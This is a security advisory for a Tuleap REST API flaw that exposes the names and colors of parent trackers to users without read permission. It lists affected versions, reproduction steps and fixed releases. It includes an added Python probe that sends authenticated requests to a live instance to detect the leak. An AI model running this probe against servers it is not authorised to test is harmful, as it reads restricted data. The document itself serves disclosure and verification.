Enalean Tuleap
cpe:2.3:a:enalean:tuleap:*:*:*:*:*:*:*
- < 16.5.99.1742392651
- < 16.5-5
- < 16.4-8
A vulnerability exists in Tuleap's REST API, where read permissions are not properly enforced on parent trackers. This issue allows users to access names and colors of parent trackers that they should not be able to see. The vulnerability is present in Tuleap Community Edition versions prior to 16.5.99.1742392651, as well as in Tuleap Enterprise Edition versions prior to 16.5-5 and 16.4-8.
Exploitation of this vulnerability could lead to unauthorized visibility of tracker names and details that are meant to be restricted.
To reproduce this vulnerability, authenticate as a user who has read permission on a child tracker but not on its parent tracker, then send a GET request to the child tracker's REST endpoint. The response will include the parent tracker's name and color, even though a direct request for the parent tracker is refused for that user.
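The following probe is an added example, not code from the advisory or from the Tuleap project. It performs the two-request check described above with only the Python standard library: fetch the child tracker, then try to fetch its parent with the same credentials, and report a leak when the parent is refused but its name or color still appears in the child representation. The endpoint paths (`/api/trackers/{id}`), the `X-Auth-AccessKey` header, and the field names `label`, `name`, `color_name` and `color` are assumptions about the Tuleap REST API; the embedded sample response is constructed for the offline check at the bottom and is not captured from a real instance.

```python
"""Probe for parent-tracker metadata exposed through a child tracker's REST representation."""
import json
import sys
import urllib.error
import urllib.request

# Assumed field names under which a tracker's name and color are returned.
LEAK_KEYS = frozenset({"label", "name", "color_name", "color"})


def parent_leak(child_tracker, parent_readable):
    """Return the parent fields the caller could see without read permission on the parent.

    child_tracker:   decoded JSON of GET /api/trackers/{child_id} (assumed path)
    parent_readable: True when GET /api/trackers/{parent_id} succeeded for the same user
    """
    parent = child_tracker.get("parent")
    if parent_readable or not isinstance(parent, dict):
        return set()
    return {key for key in parent if key in LEAK_KEYS}


def verdict(child_tracker, parent_status):
    """Classify one probe: NO_PARENT, OK (parent hidden or legitimately readable) or LEAK."""
    parent = child_tracker.get("parent")
    if not isinstance(parent, dict):
        return "NO_PARENT"
    leaked = parent_leak(child_tracker, parent_status == 200)
    return "LEAK" if leaked else "OK"


def api_get(base_url, path, access_key):
    """GET a JSON resource; returns (status, decoded body or None)."""
    req = urllib.request.Request(
        base_url.rstrip("/") + path,
        headers={"X-Auth-AccessKey": access_key, "Accept": "application/json"},  # assumed header
    )
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status, json.load(resp)
    except urllib.error.HTTPError as err:
        return err.code, None


def probe(base_url, child_id, access_key):
    """Run the two-request check against a live instance and return the verdict."""
    status, child = api_get(base_url, f"/api/trackers/{child_id}", access_key)
    if status != 200 or child is None:
        raise SystemExit(f"child tracker {child_id} not readable (HTTP {status})")
    parent = child.get("parent")
    if not isinstance(parent, dict) or "id" not in parent:
        return "NO_PARENT"
    parent_status, _ = api_get(base_url, f"/api/trackers/{parent['id']}", access_key)
    result = verdict(child, parent_status)
    if result == "LEAK":
        print(f"parent tracker {parent['id']} refused (HTTP {parent_status}) "
              f"but exposed: {sorted(parent_leak(child, False))}")
    return result


# Constructed sample: what an unfixed server might return to a user who cannot read tracker 7.
SAMPLE_CHILD = {
    "id": 42,
    "label": "Tasks",
    "parent": {"id": 7, "uri": "trackers/7", "label": "Epics", "color_name": "inca-silver"},
}

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print(f"usage: {sys.argv[0]} https://tuleap.example CHILD_TRACKER_ID ACCESS_KEY")
        print("offline self-check on constructed sample:", verdict(SAMPLE_CHILD, 403))
        sys.exit(2)
    print(probe(sys.argv[1], int(sys.argv[2]), sys.argv[3]))
```

Run it with the access key of a low-privileged test user: a `LEAK` verdict means the parent was refused directly yet its name or color came back inside the child, which is the behaviour the fixed versions remove; `OK` after upgrading confirms the child representation no longer carries those fields for that user.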
Users can upgrade to Tuleap Community Edition 16.5.99.1742392651 or Tuleap Enterprise Edition 16.5-5 or 16.4-8 to address this vulnerability.